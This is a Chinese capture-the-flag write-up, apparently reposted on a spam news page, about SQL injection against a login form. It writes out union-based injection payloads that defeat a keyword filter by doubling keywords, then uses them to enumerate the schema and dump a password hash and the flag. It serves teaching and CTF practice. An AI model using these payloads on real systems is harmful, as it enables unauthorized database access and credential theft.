当前位置: 首页 > news >正文

网页设计与制作简历seo快速排名

网页设计与制作简历,seo快速排名,百度广告平台电话,悬浮网站底部代码打开题目 随便输入账号密码 根据报错信息可知这是单引号的字符型注入 那我们试试万能密码 1 or 11 页面报错 1 or 11 页面报错 而且根据报错内容显示是没有我们注入上去的or的 那我们就试试 1 order by 3 # 页面报错,根据报错显示页面过滤掉了or和by 那我们…

打开题目

随便输入账号密码

根据报错信息可知这是单引号的字符型注入

那我们试试万能密码

1' or '1'='1  页面报错

1  or '1'='1 页面报错

而且根据报错内容显示是没有我们注入上去的or的

那我们就试试

1' order by 3 #

页面报错,根据报错显示页面过滤掉了or和by

那我们试试

-1' union select 1,2,3,4 #

根据报错显示页面过滤了union和select

那我们就可以尝试双写绕过

1' ununionion seselectlect 1 #

报错显示有不同的列名

那就一个一个试吧

1' ununionion seselectlect 1,2,3#

页面正常

并且这里显示报错显示位为2,3

1' ununionion seselectlect 1,2,3,4#

页面报错

说明列名字段数为3

爆用户名和数据库名

-1’ ununionion seselectlect 1,user(),database()  #

这样我们就可以知道数据库用户名为root@localhost,数据库名为geek

-1' ununionion seselectlect 1,version(),@@version_compile_os #

这样我们就知道操作系统version_compile_os为Linux,数据库版本为10.3.18-MariaDB

总结一下就是

操作系统version_compile_os:Linux

数据库版本version():  10.3.18-MariaDB

数据库用户名user():  root@localhost

数据库名database():  geek

接下来我们查询geek数据库下的表名信息

-1' ununionion seselectlect 1,table_name,3 from information_schema.tables where table_shcema='geek' #

我们发现informmation,where都被过滤掉了

那我们对其进行双写

-1' uunionnion seselectlect 1,group_concat(table_name),3 frfromom inforformationmation_schema.tables whwhereere table_schema='geek' #

忘记页面是过滤or了

重新换个姿势

-1' ununionion seselectlect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whwhereere table_schema='geek' #

说明表名有b4bsql,geekuser

爆破列名

-1' ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='geekuser' #

爆破数据

-1' uunionnion seselectlect 1,2,password frfromom geekuser  #

又忘记过滤or了

-1' uunionnion seselectlect 1,2,group_concat(passwoorrd) frfromom geekuser  #

这下爆出了password为2ac772d9987993a29b85958839d4e468

用户名为admin

id为1

尝试登录了一下用户名和密码,发现下面没有flag

那我们爆破b4bsql表下的列名

-1' ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql' #

发现下面也有三个列名

-1' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql #

查看页面源代码得到flag

知识点:

常见的sql注入绕过方式:SQL注入绕过入门总结篇 - FreeBuf网络安全行业门户

information_schema.schemata 获取所有数据库信息

表包含以下列:

  1. catalog_name:目录名称
  2. schema_name: 模式(数据库)的名称。
  3. default_character_set_name: 数据库编码。
  4. default_collation_name: 数据库排序规则

http://www.tj-hxxt.cn/news/52673.html

相关文章:

  • 建设一个视频网站的成本厦门seo网站排名优化
  • 盘锦做网站电话怎么做网站主页
  • 企业网站开发实训总结快速提高关键词排名的软件
  • 做地铁建设的公司网站网络优化有前途吗
  • iis怎么创建网站朋友圈广告投放价格表
  • 学做馒头面包哪个网站好网络营销的用户创造价值
  • php培训网站源码网站运营一个月多少钱
  • 怎么做代理网站搜索引擎营销的优势和劣势
  • 辽宁同鑫建设有限公司网站百度排行
  • 一个网站做数据维护3天正常吗seo快速排名软件app
  • wordpress编辑区块报警珠海百度搜索排名优化
  • 中华人民共和国城乡建设部网站首页外链平台
  • 西安网站制作顶尖公司百度平台投诉人工电话
  • 个人建设网站论文设计培训学院
  • 淘客必须做网站汕头seo排名公司
  • 云浮 网站建设网站友情链接是什么
  • 改织梦模板做网站宁波seo推广公司排名
  • pyton怎么做网站的代码百度推广有用吗
  • 网站建设需要会代码吗google官网入口
  • app和网站开发语言的区别学网络营销
  • 网站建设阶段seo优化器
  • 类wordpress java企业网站的搜索引擎推广与优化
  • 外卖网站 模板网络软件开发
  • 游戏网站建设项目规划日照seo优化
  • wordpress中文安装教程视频教程seo排名赚app官网
  • 青岛百度网站排名优化网站建设明细报价表
  • 网页设计制作一个餐饮网站厦门关键词优化seo
  • 建立电子商务网站目的百度竞价广告收费标准
  • 优服优科网站建设公司免费制作个人网站
  • 可以做头像的网站沪指重上3000点